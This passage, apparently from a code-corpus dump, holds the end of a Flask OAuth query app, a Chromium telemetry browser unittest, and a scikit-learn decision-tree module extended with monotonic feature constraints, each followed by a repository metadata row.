oauth_request.sign_request(oauth2.SignatureMethod_HMAC_SHA1(), consumer, token)
signed_url = oauth_request.to_url()
print 'Querying {0} ...'.format(url)
conn = urllib2.urlopen(signed_url, None)
try:
response = json.dumps(json.loads(conn.read()))
finally:
conn.close()
return response
if __name__ == '__main__':
port = int(os.environ.get("PORT", 5000))
app.run(host='0.0.0.0', port=port)
| mit | -7,069,045,472,730,618,000 | 26.977011 | 122 | 0.614879 | false | 2.917266 | false | false | false |
leighpauls/k2cro4 | tools/telemetry/telemetry/browser_unittest.py | 1 | 2018 | # Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import unittest
from telemetry import browser_finder
from telemetry import options_for_unittests
class BrowserTest(unittest.TestCase):
def testBrowserCreation(self):
options = options_for_unittests.GetCopy()
browser_to_create = browser_finder.FindBrowser(options)
if not browser_to_create:
raise Exception('No browser found, cannot continue test.')
with browser_to_create.Create() as b:
self.assertEquals(1, b.num_tabs)
# Different browsers boot up to different things
assert b.GetNthTabUrl(0)
def testCommandLineOverriding(self):
# This test starts the browser with --enable-benchmarking, which should
# create a chrome.Interval namespace. This tests whether the command line is
# being set.
options = options_for_unittests.GetCopy()
flag1 = '--user-agent=telemetry'
options.extra_browser_args.append(flag1)
browser_to_create = browser_finder.FindBrowser(options)
with browser_to_create.Create() as b:
with b.ConnectToNthTab(0) as t:
t.page.Navigate('http://www.google.com/')
t.WaitForDocumentReadyStateToBeInteractiveOrBetter()
self.assertEquals(t.runtime.Evaluate('navigator.userAgent'),
'telemetry')
def testNewCloseTab(self):
options = options_for_unittests.GetCopy()
browser_to_create = browser_finder.FindBrowser(options)
with browser_to_create.Create() as b:
self.assertEquals(1, b.num_tabs)
existing_tab_url = b.GetNthTabUrl(0)
b.NewTab()
self.assertEquals(2, b.num_tabs)
self.assertEquals(b.GetNthTabUrl(0), existing_tab_url)
self.assertEquals(b.GetNthTabUrl(1), 'about:blank')
b.CloseTab(1)
self.assertEquals(1, b.num_tabs)
self.assertEquals(b.GetNthTabUrl(0), existing_tab_url)
self.assertRaises(AssertionError, b.CloseTab, 0)
| bsd-3-clause | -3,250,190,862,858,584,600 | 38.568627 | 80 | 0.707136 | false | 3.695971 | true | false | false |
PatrickOReilly/scikit-learn | sklearn/tree/tree.py | 1 | 44306 | """
This module gathers tree-based methods, including decision, regression and
randomized trees. Single and multi-output problems are both handled.
"""
# Authors: Gilles Louppe <[email protected]>
# Peter Prettenhofer <[email protected]>
# Brian Holt <[email protected]>
# Noel Dawe <[email protected]>
# Satrajit Gosh <[email protected]>
# Joly Arnaud <[email protected]>
# Fares Hedayati <[email protected]>
# Nelson Liu <[email protected]>
#
# License: BSD 3 clause
from __future__ import division
import numbers
from abc import ABCMeta
from abc import abstractmethod
from math import ceil
import numpy as np
from scipy.sparse import issparse
from ..base import BaseEstimator
from ..base import ClassifierMixin
from ..base import RegressorMixin
from ..externals import six
from ..feature_selection.from_model import _LearntSelectorMixin
from ..utils import check_array
from ..utils import check_random_state
from ..utils import compute_sample_weight
from ..utils.multiclass import check_classification_targets
from ..exceptions import NotFittedError
from ._criterion import Criterion
from ._splitter import Splitter
from ._tree import DepthFirstTreeBuilder
from ._tree import BestFirstTreeBuilder
from ._tree import Tree
from . import _tree, _splitter, _criterion
__all__ = ["DecisionTreeClassifier",
"DecisionTreeRegressor",
"ExtraTreeClassifier",
"ExtraTreeRegressor"]
# =============================================================================
# Types and constants
# =============================================================================
DTYPE = _tree.DTYPE
DOUBLE = _tree.DOUBLE
CRITERIA_CLF = {"gini": _criterion.Gini, "entropy": _criterion.Entropy}
CRITERIA_REG = {"mse": _criterion.MSE, "friedman_mse": _criterion.FriedmanMSE,
"mae": _criterion.MAE}
DENSE_SPLITTERS = {"best": _splitter.BestSplitter,
"random": _splitter.RandomSplitter}
SPARSE_SPLITTERS = {"best": _splitter.BestSparseSplitter,
"random": _splitter.RandomSparseSplitter}
# =============================================================================
# Base decision tree
# =============================================================================
class BaseDecisionTree(six.with_metaclass(ABCMeta, BaseEstimator,
_LearntSelectorMixin)):
"""Base class for decision trees.
Warning: This class should not be used directly.
Use derived classes instead.
"""
@abstractmethod
def __init__(self,
criterion,
splitter,
max_depth,
min_samples_split,
min_samples_leaf,
min_weight_fraction_leaf,
max_features,
max_leaf_nodes,
random_state,
min_impurity_split,
class_weight=None,
presort=False,
increasing=None,
decreasing=None):
self.criterion = criterion
self.splitter = splitter
self.max_depth = max_depth
self.min_samples_split = min_samples_split
self.min_samples_leaf = min_samples_leaf
self.min_weight_fraction_leaf = min_weight_fraction_leaf
self.max_features = max_features
self.random_state = random_state
self.max_leaf_nodes = max_leaf_nodes
self.min_impurity_split = min_impurity_split
self.class_weight = class_weight
self.presort = presort
self.increasing = increasing
self.decreasing = decreasing
self.n_features_ = None
self.n_outputs_ = None
self.classes_ = None
self.n_classes_ = None
self.tree_ = None
self.max_features_ = None
def fit(self, X, y, sample_weight=None, check_input=True,
X_idx_sorted=None):
"""Build a decision tree from the training set (X, y).
Parameters
----------
X : array-like or sparse matrix, shape = [n_samples, n_features]
The training input samples. Internally, it will be converted to
``dtype=np.float32`` and if a sparse matrix is provided
to a sparse ``csc_matrix``.
y : array-like, shape = [n_samples] or [n_samples, n_outputs]
The target values (class labels in classification, real numbers in
regression). In the regression case, use ``dtype=np.float64`` and
``order='C'`` for maximum efficiency.
sample_weight : array-like, shape = [n_samples] or None
Sample weights. If None, then samples are equally weighted. Splits
that would create child nodes with net zero or negative weight are
ignored while searching for a split in each node. In the case of
classification, splits are also ignored if they would result in any
single class carrying a negative weight in either child node.
check_input : boolean, (default=True)
Allow to bypass several input checking.
Don't use this parameter unless you know what you do.
X_idx_sorted : array-like, shape = [n_samples, n_features], optional
The indexes of the sorted training input samples. If many tree
are grown on the same dataset, this allows the ordering to be
cached between trees. If None, the data will be sorted here.
Don't use this parameter unless you know what to do.
Returns
-------
self : object
Returns self.
"""
random_state = check_random_state(self.random_state)
if check_input:
X = check_array(X, dtype=DTYPE, accept_sparse="csc")
y = check_array(y, ensure_2d=False, dtype=None)
if issparse(X):
X.sort_indices()
if X.indices.dtype != np.intc or X.indptr.dtype != np.intc:
raise ValueError("No support for np.int64 index based "
"sparse matrices")
# Determine output settings
n_samples, self.n_features_ = X.shape
is_classification = isinstance(self, ClassifierMixin)
y = np.atleast_1d(y)
expanded_class_weight = None
if y.ndim == 1:
# reshape is necessary to preserve the data contiguity against vs
# [:, np.newaxis] that does not.
y = np.reshape(y, (-1, 1))
self.n_outputs_ = y.shape[1]
if is_classification:
check_classification_targets(y)
y = np.copy(y)
self.classes_ = []
self.n_classes_ = []
if self.class_weight is not None:
y_original = np.copy(y)
y_encoded = np.zeros(y.shape, dtype=np.int)
for k in range(self.n_outputs_):
classes_k, y_encoded[:, k] = np.unique(y[:, k],
return_inverse=True)
self.classes_.append(classes_k)
self.n_classes_.append(classes_k.shape[0])
y = y_encoded
if self.class_weight is not None:
expanded_class_weight = compute_sample_weight(
self.class_weight, y_original)
else:
self.classes_ = [None] * self.n_outputs_
self.n_classes_ = [1] * self.n_outputs_
self.n_classes_ = np.array(self.n_classes_, dtype=np.intp)
if getattr(y, "dtype", None) != DOUBLE or not y.flags.contiguous:
y = np.ascontiguousarray(y, dtype=DOUBLE)
# Check parameters
max_depth = ((2 ** 31) - 1 if self.max_depth is None
else self.max_depth)
max_leaf_nodes = (-1 if self.max_leaf_nodes is None
else self.max_leaf_nodes)
if isinstance(self.min_samples_leaf, (numbers.Integral, np.integer)):
min_samples_leaf = self.min_samples_leaf
else: # float
min_samples_leaf = int(ceil(self.min_samples_leaf * n_samples))
if isinstance(self.min_samples_split, (numbers.Integral, np.integer)):
min_samples_split = self.min_samples_split
else: # float
min_samples_split = int(ceil(self.min_samples_split * n_samples))
min_samples_split = max(2, min_samples_split)
min_samples_split = max(min_samples_split, 2 * min_samples_leaf)
if isinstance(self.max_features, six.string_types):
if self.max_features == "auto":
if is_classification:
max_features = max(1, int(np.sqrt(self.n_features_)))
else:
max_features = self.n_features_
elif self.max_features == "sqrt":
max_features = max(1, int(np.sqrt(self.n_features_)))
elif self.max_features == "log2":
max_features = max(1, int(np.log2(self.n_features_)))
else:
raise ValueError(
'Invalid value for max_features. Allowed string '
'values are "auto", "sqrt" or "log2".')
elif self.max_features is None:
max_features = self.n_features_
elif isinstance(self.max_features, (numbers.Integral, np.integer)):
max_features = self.max_features
else: # float
if self.max_features > 0.0:
max_features = max(1,
int(self.max_features * self.n_features_))
else:
max_features = 0
self.max_features_ = max_features
if len(y) != n_samples:
raise ValueError("Number of labels=%d does not match "
"number of samples=%d" % (len(y), n_samples))
if not (0. < self.min_samples_split <= 1. or
2 <= self.min_samples_split):
raise ValueError("min_samples_split must be in at least 2"
" or in (0, 1], got %s" % min_samples_split)
if not (0. < self.min_samples_leaf <= 0.5 or
1 <= self.min_samples_leaf):
raise ValueError("min_samples_leaf must be at least than 1 "
"or in (0, 0.5], got %s" % min_samples_leaf)
if not 0 <= self.min_weight_fraction_leaf <= 0.5:
raise ValueError("min_weight_fraction_leaf must in [0, 0.5]")
if max_depth <= 0:
raise ValueError("max_depth must be greater than zero. ")
if not (0 < max_features <= self.n_features_):
raise ValueError("max_features must be in (0, n_features]")
if not isinstance(max_leaf_nodes, (numbers.Integral, np.integer)):
raise ValueError("max_leaf_nodes must be integral number but was "
"%r" % max_leaf_nodes)
if -1 < max_leaf_nodes < 2:
raise ValueError(("max_leaf_nodes {0} must be either smaller than "
"0 or larger than 1").format(max_leaf_nodes))
if sample_weight is not None:
if (getattr(sample_weight, "dtype", None) != DOUBLE or
not sample_weight.flags.contiguous):
sample_weight = np.ascontiguousarray(
sample_weight, dtype=DOUBLE)
if len(sample_weight.shape) > 1:
raise ValueError("Sample weights array has more "
"than one dimension: %d" %
len(sample_weight.shape))
if len(sample_weight) != n_samples:
raise ValueError("Number of weights=%d does not match "
"number of samples=%d" %
(len(sample_weight), n_samples))
if expanded_class_weight is not None:
if sample_weight is not None:
sample_weight = sample_weight * expanded_class_weight
else:
sample_weight = expanded_class_weight
# Set min_weight_leaf from min_weight_fraction_leaf
if self.min_weight_fraction_leaf != 0. and sample_weight is not None:
min_weight_leaf = (self.min_weight_fraction_leaf *
np.sum(sample_weight))
else:
min_weight_leaf = 0.
if self.min_impurity_split < 0.:
raise ValueError("min_impurity_split must be greater than or equal "
"to 0")
presort = self.presort
# Allow presort to be 'auto', which means True if the dataset is dense,
# otherwise it will be False.
if self.presort == 'auto' and issparse(X):
presort = False
elif self.presort == 'auto':
presort = True
if presort is True and issparse(X):
raise ValueError("Presorting is not supported for sparse "
"matrices.")
# If multiple trees are built on the same dataset, we only want to
# presort once. Splitters now can accept presorted indices if desired,
# but do not handle any presorting themselves. Ensemble algorithms
# which desire presorting must do presorting themselves and pass that
# matrix into each tree.
if X_idx_sorted is None and presort:
X_idx_sorted = np.asfortranarray(np.argsort(X, axis=0),
dtype=np.int32)
if presort and X_idx_sorted.shape != X.shape:
raise ValueError("The shape of X (X.shape = {}) doesn't match "
"the shape of X_idx_sorted (X_idx_sorted"
".shape = {})".format(X.shape,
X_idx_sorted.shape))
# Build tree
criterion = self.criterion
if not isinstance(criterion, Criterion):
if is_classification:
criterion = CRITERIA_CLF[self.criterion](self.n_outputs_,
self.n_classes_)
else:
criterion = CRITERIA_REG[self.criterion](self.n_outputs_,
n_samples)
SPLITTERS = SPARSE_SPLITTERS if issparse(X) else DENSE_SPLITTERS
def _encode_monotonic(increasing, decreasing):
if increasing is None: increasing = []
if decreasing is None: decreasing = []
def is_int_in_range(feature):
return isinstance(feature, int) and 0 <= feature < self.n_features_
def is_valid(features):
return (isinstance(features, list) and
all(is_int_in_range(feature) for feature in features))
if not is_valid(increasing):
raise ValueError("increasing should be a list of ints in the range [0,n_features].")
if not is_valid(decreasing):
raise ValueError("decreasing should be a list of ints in the range [0,n_features].")
if increasing and decreasing:
intersection = set(increasing) & set(decreasing)
if intersection:
raise ValueError("The following features cannot be both increasing and decreasing: " + str(list(intersection)))
monotonic = np.zeros(self.n_features_, dtype=np.int32)
if increasing:
for feature in increasing:
monotonic[feature] = 1
if decreasing:
for feature in decreasing:
monotonic[feature] = -1
return monotonic
monotonic = _encode_monotonic(self.increasing, self.decreasing)
splitter = self.splitter
if not isinstance(self.splitter, Splitter):
splitter = SPLITTERS[self.splitter](criterion,
self.max_features_,
min_samples_leaf,
min_weight_leaf,
random_state,
self.presort,
monotonic)
self.tree_ = Tree(self.n_features_, self.n_classes_, self.n_outputs_)
# Use BestFirst if max_leaf_nodes given; use DepthFirst otherwise
if max_leaf_nodes < 0:
builder = DepthFirstTreeBuilder(splitter, min_samples_split,
min_samples_leaf,
min_weight_leaf,
max_depth, self.min_impurity_split)
else:
builder = BestFirstTreeBuilder(splitter, min_samples_split,
min_samples_leaf,
min_weight_leaf,
max_depth,
max_leaf_nodes, self.min_impurity_split)
builder.build(self.tree_, X, y, sample_weight, X_idx_sorted)
if self.n_outputs_ == 1:
self.n_classes_ = self.n_classes_[0]
self.classes_ = self.classes_[0]
return self
def _validate_X_predict(self, X, check_input):
"""Validate X whenever one tries to predict, apply, predict_proba"""
if self.tree_ is None:
raise NotFittedError("Estimator not fitted, "
"call `fit` before exploiting the model.")
if check_input:
X = check_array(X, dtype=DTYPE, accept_sparse="csr")
if issparse(X) and (X.indices.dtype != np.intc or
X.indptr.dtype != np.intc):
raise ValueError("No support for np.int64 index based "
"sparse matrices")
n_features = X.shape[1]
if self.n_features_ != n_features:
raise ValueError("Number of features of the model must "
"match the input. Model n_features is %s and "
"input n_features is %s "
% (self.n_features_, n_features))
return X
def predict(self, X, check_input=True):
"""Predict class or regression value for X.
For a classification model, the predicted class for each sample in X is
returned. For a regression model, the predicted value based on X is
returned.
Parameters
----------
X : array-like or sparse matrix of shape = [n_samples, n_features]
The input samples. Internally, it will be converted to
``dtype=np.float32`` and if a sparse matrix is provided
to a sparse ``csr_matrix``.
check_input : boolean, (default=True)
Allow to bypass several input checking.
Don't use this parameter unless you know what you do.
Returns
-------
y : array of shape = [n_samples] or [n_samples, n_outputs]
The predicted classes, or the predict values.
"""
X = self._validate_X_predict(X, check_input)
proba = self.tree_.predict(X)
n_samples = X.shape[0]
# Classification
if isinstance(self, ClassifierMixin):
if self.n_outputs_ == 1:
return self.classes_.take(np.argmax(proba, axis=1), axis=0)
else:
predictions = np.zeros((n_samples, self.n_outputs_))
for k in range(self.n_outputs_):
predictions[:, k] = self.classes_[k].take(
np.argmax(proba[:, k], axis=1),
axis=0)
return predictions
# Regression
else:
if self.n_outputs_ == 1:
return proba[:, 0]
else:
return proba[:, :, 0]
def apply(self, X, check_input=True):
"""
Returns the index of the leaf that each sample is predicted as.
.. versionadded:: 0.17
Parameters
----------
X : array_like or sparse matrix, shape = [n_samples, n_features]
The input samples. Internally, it will be converted to
``dtype=np.float32`` and if a sparse matrix is provided
to a sparse ``csr_matrix``.
check_input : boolean, (default=True)
Allow to bypass several input checking.
Don't use this parameter unless you know what you do.
Returns
-------
X_leaves : array_like, shape = [n_samples,]
For each datapoint x in X, return the index of the leaf x
ends up in. Leaves are numbered within
``[0; self.tree_.node_count)``, possibly with gaps in the
numbering.
"""
X = self._validate_X_predict(X, check_input)
return self.tree_.apply(X)
def decision_path(self, X, check_input=True):
"""Return the decision path in the tree
Parameters
----------
X : array_like or sparse matrix, shape = [n_samples, n_features]
The input samples. Internally, it will be converted to
``dtype=np.float32`` and if a sparse matrix is provided
to a sparse ``csr_matrix``.
check_input : boolean, (default=True)
Allow to bypass several input checking.
Don't use this parameter unless you know what you do.
Returns
-------
indicator : sparse csr array, shape = [n_samples, n_nodes]
Return a node indicator matrix where non zero elements
indicates that the samples goes through the nodes.
"""
X = self._validate_X_predict(X, check_input)
return self.tree_.decision_path(X)
@property
def feature_importances_(self):
"""Return the feature importances.
The importance of a feature is computed as the (normalized) total
reduction of the criterion brought by that feature.
It is also known as the Gini importance.
Returns
-------
feature_importances_ : array, shape = [n_features]
"""
if self.tree_ is None:
raise NotFittedError("Estimator not fitted, call `fit` before"
" `feature_importances_`.")
return self.tree_.compute_feature_importances()
# =============================================================================
# Public estimators
# =============================================================================
class DecisionTreeClassifier(BaseDecisionTree, ClassifierMixin):
"""A decision tree classifier.
Read more in the :ref:`User Guide <tree>`.
Parameters
----------
criterion : string, optional (default="gini")
The function to measure the quality of a split. Supported criteria are
"gini" for the Gini impurity and "entropy" for the information gain.
splitter : string, optional (default="best")
The strategy used to choose the split at each node. Supported
strategies are "best" to choose the best split and "random" to choose
the best random split.
max_features : int, float, string or None, optional (default=None)
The number of features to consider when looking for the best split:
- If int, then consider `max_features` features at each split.
- If float, then `max_features` is a percentage and
`int(max_features * n_features)` features are considered at each
split.
- If "auto", then `max_features=sqrt(n_features)`.
- If "sqrt", then `max_features=sqrt(n_features)`.
- If "log2", then `max_features=log2(n_features)`.
- If None, then `max_features=n_features`.
Note: the search for a split does not stop until at least one
valid partition of the node samples is found, even if it requires to
effectively inspect more than ``max_features`` features.
max_depth : int or None, optional (default=None)
The maximum depth of the tree. If None, then nodes are expanded until
all leaves are pure or until all leaves contain less than
min_samples_split samples.
min_samples_split : int, float, optional (default=2)
The minimum number of samples required to split an internal node:
- If int, then consider `min_samples_split` as the minimum number.
- If float, then `min_samples_split` is a percentage and
`ceil(min_samples_split * n_samples)` are the minimum
number of samples for each split.
min_samples_leaf : int, float, optional (default=1)
The minimum number of samples required to be at a leaf node:
- If int, then consider `min_samples_leaf` as the minimum number.
- If float, then `min_samples_leaf` is a percentage and
`ceil(min_samples_leaf * n_samples)` are the minimum
number of samples for each node.
min_weight_fraction_leaf : float, optional (default=0.)
The minimum weighted fraction of the input samples required to be at a
leaf node.
max_leaf_nodes : int or None, optional (default=None)
Grow a tree with ``max_leaf_nodes`` in best-first fashion.
Best nodes are defined as relative reduction in impurity.
If None then unlimited number of leaf nodes.
class_weight : dict, list of dicts, "balanced" or None, optional (default=None)
Weights associated with classes in the form ``{class_label: weight}``.
If not given, all classes are supposed to have weight one. For
multi-output problems, a list of dicts can be provided in the same
order as the columns of y.
The "balanced" mode uses the values of y to automatically adjust
weights inversely proportional to class frequencies in the input data
as ``n_samples / (n_classes * np.bincount(y))``
For multi-output, the weights of each column of y will be multiplied.
Note that these weights will be multiplied with sample_weight (passed
through the fit method) if sample_weight is specified.
random_state : int, RandomState instance or None, optional (default=None)
If int, random_state is the seed used by the random number generator;
If RandomState instance, random_state is the random number generator;
If None, the random number generator is the RandomState instance used
by `np.random`.
min_impurity_split : float, optional (default=1e-7)
Threshold for early stopping in tree growth. A node will split
if its impurity is above the threshold, otherwise it is a leaf.
.. versionadded:: 0.18
presort : bool, optional (default=False)
Whether to presort the data to speed up the finding of best splits in
fitting. For the default settings of a decision tree on large
datasets, setting this to true may slow down the training process.
When using either a smaller dataset or a restricted depth, this may
speed up the training.
increasing : list of ints, optional (default=None)
Indices of features to have a monotonically increasing effect.
decreasing : list of ints, optional (default=None)
Indices of features to have a monotonically decreasing effect.
Attributes
----------
classes_ : array of shape = [n_classes] or a list of such arrays
The classes labels (single output problem),
or a list of arrays of class labels (multi-output problem).
feature_importances_ : array of shape = [n_features]
The feature importances. The higher, the more important the
feature. The importance of a feature is computed as the (normalized)
total reduction of the criterion brought by that feature. It is also
known as the Gini importance [4]_.
max_features_ : int,
The inferred value of max_features.
n_classes_ : int or list
The number of classes (for single output problems),
or a list containing the number of classes for each
output (for multi-output problems).
n_features_ : int
The number of features when ``fit`` is performed.
n_outputs_ : int
The number of outputs when ``fit`` is performed.
tree_ : Tree object
The underlying Tree object.
See also
--------
DecisionTreeRegressor
References
----------
.. [1] https://en.wikipedia.org/wiki/Decision_tree_learning
.. [2] L. Breiman, J. Friedman, R. Olshen, and C. Stone, "Classification
and Regression Trees", Wadsworth, Belmont, CA, 1984.
.. [3] T. Hastie, R. Tibshirani and J. Friedman. "Elements of Statistical
Learning", Springer, 2009.
.. [4] L. Breiman, and A. Cutler, "Random Forests",
http://www.stat.berkeley.edu/~breiman/RandomForests/cc_home.htm
Examples
--------
>>> from sklearn.datasets import load_iris
>>> from sklearn.model_selection import cross_val_score
>>> from sklearn.tree import DecisionTreeClassifier
>>> clf = DecisionTreeClassifier(random_state=0)
>>> iris = load_iris()
>>> cross_val_score(clf, iris.data, iris.target, cv=10)
... # doctest: +SKIP
...
array([ 1. , 0.93..., 0.86..., 0.93..., 0.93...,
0.93..., 0.93..., 1. , 0.93..., 1. ])
"""
def __init__(self,
criterion="gini",
splitter="best",
max_depth=None,
min_samples_split=2,
min_samples_leaf=1,
min_weight_fraction_leaf=0.,
max_features=None,
random_state=None,
max_leaf_nodes=None,
min_impurity_split=1e-7,
class_weight=None,
presort=False,
increasing=None,
decreasing=None):
super(DecisionTreeClassifier, self).__init__(
criterion=criterion,
splitter=splitter,
max_depth=max_depth,
min_samples_split=min_samples_split,
min_samples_leaf=min_samples_leaf,
min_weight_fraction_leaf=min_weight_fraction_leaf,
max_features=max_features,
max_leaf_nodes=max_leaf_nodes,
class_weight=class_weight,
random_state=random_state,
min_impurity_split=min_impurity_split,
presort=presort,
increasing=increasing,
decreasing=decreasing)
def predict_proba(self, X, check_input=True):
"""Predict class probabilities of the input samples X.
The predicted class probability is the fraction of samples of the same
class in a leaf.
check_input : boolean, (default=True)
Allow to bypass several input checking.
Don't use this parameter unless you know what you do.
Parameters
----------
X : array-like or sparse matrix of shape = [n_samples, n_features]
The input samples. Internally, it will be converted to
``dtype=np.float32`` and if a sparse matrix is provided
to a sparse ``csr_matrix``.
Returns
-------
p : array of shape = [n_samples, n_classes], or a list of n_outputs
such arrays if n_outputs > 1.
The class probabilities of the input samples. The order of the
classes corresponds to that in the attribute `classes_`.
"""
X = self._validate_X_predict(X, check_input)
proba = self.tree_.predict(X)
if self.n_outputs_ == 1:
proba = proba[:, :self.n_classes_]
normalizer = proba.sum(axis=1)[:, np.newaxis]
normalizer[normalizer == 0.0] = 1.0
proba /= normalizer
return proba
else:
all_proba = []
for k in range(self.n_outputs_):
proba_k = proba[:, k, :self.n_classes_[k]]
normalizer = proba_k.sum(axis=1)[:, np.newaxis]
normalizer[normalizer == 0.0] = 1.0
proba_k /= normalizer
all_proba.append(proba_k)
return all_proba
def predict_log_proba(self, X):
"""Predict class log-probabilities of the input samples X.
Parameters
----------
X : array-like or sparse matrix of shape = [n_samples, n_features]
The input samples. Internally, it will be converted to
``dtype=np.float32`` and if a sparse matrix is provided
to a sparse ``csr_matrix``.
Returns
-------
p : array of shape = [n_samples, n_classes], or a list of n_outputs
such arrays if n_outputs > 1.
The class log-probabilities of the input samples. The order of the
classes corresponds to that in the attribute `classes_`.
"""
proba = self.predict_proba(X)
if self.n_outputs_ == 1:
return np.log(proba)
else:
for k in range(self.n_outputs_):
proba[k] = np.log(proba[k])
return proba
class DecisionTreeRegressor(BaseDecisionTree, RegressorMixin):
"""A decision tree regressor.
Read more in the :ref:`User Guide <tree>`.
Parameters
----------
criterion : string, optional (default="mse")
The function to measure the quality of a split. Supported criteria
are "mse" for the mean squared error, which is equal to variance
reduction as feature selection criterion, and "mae" for the mean
absolute error.
.. versionadded:: 0.18
Mean Absolute Error (MAE) criterion.
splitter : string, optional (default="best")
The strategy used to choose the split at each node. Supported
strategies are "best" to choose the best split and "random" to choose
the best random split.
max_features : int, float, string or None, optional (default=None)
The number of features to consider when looking for the best split:
- If int, then consider `max_features` features at each split.
- If float, then `max_features` is a percentage and
`int(max_features * n_features)` features are considered at each
split.
- If "auto", then `max_features=n_features`.
- If "sqrt", then `max_features=sqrt(n_features)`.
- If "log2", then `max_features=log2(n_features)`.
- If None, then `max_features=n_features`.
Note: the search for a split does not stop until at least one
valid partition of the node samples is found, even if it requires to
effectively inspect more than ``max_features`` features.
max_depth : int or None, optional (default=None)
The maximum depth of the tree. If None, then nodes are expanded until
all leaves are pure or until all leaves contain less than
min_samples_split samples.
min_samples_split : int, float, optional (default=2)
The minimum number of samples required to split an internal node:
- If int, then consider `min_samples_split` as the minimum number.
- If float, then `min_samples_split` is a percentage and
`ceil(min_samples_split * n_samples)` are the minimum
number of samples for each split.
min_samples_leaf : int, float, optional (default=1)
The minimum number of samples required to be at a leaf node:
- If int, then consider `min_samples_leaf` as the minimum number.
- If float, then `min_samples_leaf` is a percentage and
`ceil(min_samples_leaf * n_samples)` are the minimum
number of samples for each node.
min_weight_fraction_leaf : float, optional (default=0.)
The minimum weighted fraction of the input samples required to be at a
leaf node.
max_leaf_nodes : int or None, optional (default=None)
Grow a tree with ``max_leaf_nodes`` in best-first fashion.
Best nodes are defined as relative reduction in impurity.
If None then unlimited number of leaf nodes.
random_state : int, RandomState instance or None, optional (default=None)
If int, random_state is the seed used by the random number generator;
If RandomState instance, random_state is the random number generator;
If None, the random number generator is the RandomState instance used
by `np.random`.
min_impurity_split : float, optional (default=1e-7)
Threshold for early stopping in tree growth. If the impurity
of a node is below the threshold, the node is a leaf.
.. versionadded:: 0.18
presort : bool, optional (default=False)
Whether to presort the data to speed up the finding of best splits in
fitting. For the default settings of a decision tree on large
datasets, setting this to true may slow down the training process.
When using either a smaller dataset or a restricted depth, this may
speed up the training.
increasing : list of ints, optional (default=None)
Indices of features to have a monotonically increasing effect.
decreasing : list of ints, optional (default=None)
Indices of features to have a monotonically decreasing effect.
Attributes
----------
feature_importances_ : array of shape = [n_features]
The feature importances.
The higher, the more important the feature.
The importance of a feature is computed as the
(normalized) total reduction of the criterion brought
by that feature. It is also known as the Gini importance [4]_.
max_features_ : int,
The inferred value of max_features.
n_features_ : int
The number of features when ``fit`` is performed.
n_outputs_ : int
The number of outputs when ``fit`` is performed.
tree_ : Tree object
The underlying Tree object.
See also
--------
DecisionTreeClassifier
References
----------
.. [1] https://en.wikipedia.org/wiki/Decision_tree_learning
.. [2] L. Breiman, J. Friedman, R. Olshen, and C. Stone, "Classification
and Regression Trees", Wadsworth, Belmont, CA, 1984.
.. [3] T. Hastie, R. Tibshirani and J. Friedman. "Elements of Statistical
Learning", Springer, 2009.
.. [4] L. Breiman, and A. Cutler, "Random Forests",
http://www.stat.berkeley.edu/~breiman/RandomForests/cc_home.htm
Examples
--------
>>> from sklearn.datasets import load_boston
>>> from sklearn.model_selection import cross_val_score
>>> from sklearn.tree import DecisionTreeRegressor
>>> boston = load_boston()
>>> regressor = DecisionTreeRegressor(random_state=0)
>>> cross_val_score(regressor, boston.data, boston.target, cv=10)
... # doctest: +SKIP
...
array([ 0.61..., 0.57..., -0.34..., 0.41..., 0.75...,
0.07..., 0.29..., 0.33..., -1.42..., -1.77...])
"""
def __init__(self,
criterion="mse",
splitter="best",
max_depth=None,
min_samples_split=2,
min_samples_leaf=1,
min_weight_fraction_leaf=0.,
max_features=None,
random_state=None,
max_leaf_nodes=None,
min_impurity_split=1e-7,
presort=False,
increasing=None,
decreasing=None):
super(DecisionTreeRegressor, self).__init__(
criterion=criterion,
splitter=splitter,
max_depth=max_depth,
min_samples_split=min_samples_split,
min_samples_leaf=min_samples_leaf,
min_weight_fraction_leaf=min_weight_fraction_leaf,
max_features=max_features,
max_leaf_nodes=max_leaf_nodes,
random_state=random_state,
min_impurity_split=min_impurity_split,
presort=presort,
increasing=increasing,
decreasing=decreasing)
class ExtraTreeClassifier(DecisionTreeClassifier):
"""An extremely randomized tree classifier.
Extra-trees differ from classic decision trees in the way they are built.
When looking for the best split to separate the samples of a node into two
groups, random splits are drawn for each of the `max_features` randomly
selected features and the best split among those is chosen. When
`max_features` is set 1, this amounts to building a totally random
decision tree.
Warning: Extra-trees should only be used within ensemble methods.
Read more in the :ref:`User Guide <tree>`.
See also
--------
ExtraTreeRegressor, ExtraTreesClassifier, ExtraTreesRegressor
References
----------
.. [1] P. Geurts, D. Ernst., and L. Wehenkel, "Extremely randomized trees",
Machine Learning, 63(1), 3-42, 2006.
"""
def __init__(self,
criterion="gini",
splitter="random",
max_depth=None,
min_samples_split=2,
min_samples_leaf=1,
min_weight_fraction_leaf=0.,
max_features="auto",
random_state=None,
max_leaf_nodes=None,
min_impurity_split=1e-7,
class_weight=None,
increasing=None,
decreasing=None):
super(ExtraTreeClassifier, self).__init__(
criterion=criterion,
splitter=splitter,
max_depth=max_depth,
min_samples_split=min_samples_split,
min_samples_leaf=min_samples_leaf,
min_weight_fraction_leaf=min_weight_fraction_leaf,
max_features=max_features,
max_leaf_nodes=max_leaf_nodes,
class_weight=class_weight,
min_impurity_split=min_impurity_split,
random_state=random_state,
increasing=increasing,
decreasing=decreasing)
class ExtraTreeRegressor(DecisionTreeRegressor):
"""An extremely randomized tree regressor.
Extra-trees differ from classic decision trees in the way they are built.
When looking for the best split to separate the samples of a node into two
groups, random splits are drawn for each of the `max_features` randomly
selected features and the best split among those is chosen. When
`max_features` is set to 1, this amounts to building a totally random
decision tree.
Warning: Extra-trees should only be used within ensemble methods.
Read more in the :ref:`User Guide <tree>`.
See also
--------
ExtraTreeClassifier, ExtraTreesClassifier, ExtraTreesRegressor
References
----------
.. [1] P. Geurts, D. Ernst., and L. Wehenkel, "Extremely randomized trees",
Machine Learning, 63(1), 3-42, 2006.
"""
def __init__(self,
criterion="mse",
splitter="random",
max_depth=None,
min_samples_split=2,
min_samples_leaf=1,
min_weight_fraction_leaf=0.,
max_features="auto",
random_state=None,
min_impurity_split=1e-7,
max_leaf_nodes=None,
increasing=None,
decreasing=None):
super(ExtraTreeRegressor, self).__init__(
criterion=criterion,
splitter=splitter,
max_depth=max_depth,
min_samples_split=min_samples_split,
min_samples_leaf=min_samples_leaf,
min_weight_fraction_leaf=min_weight_fraction_leaf,
max_features=max_features,
max_leaf_nodes=max_leaf_nodes,
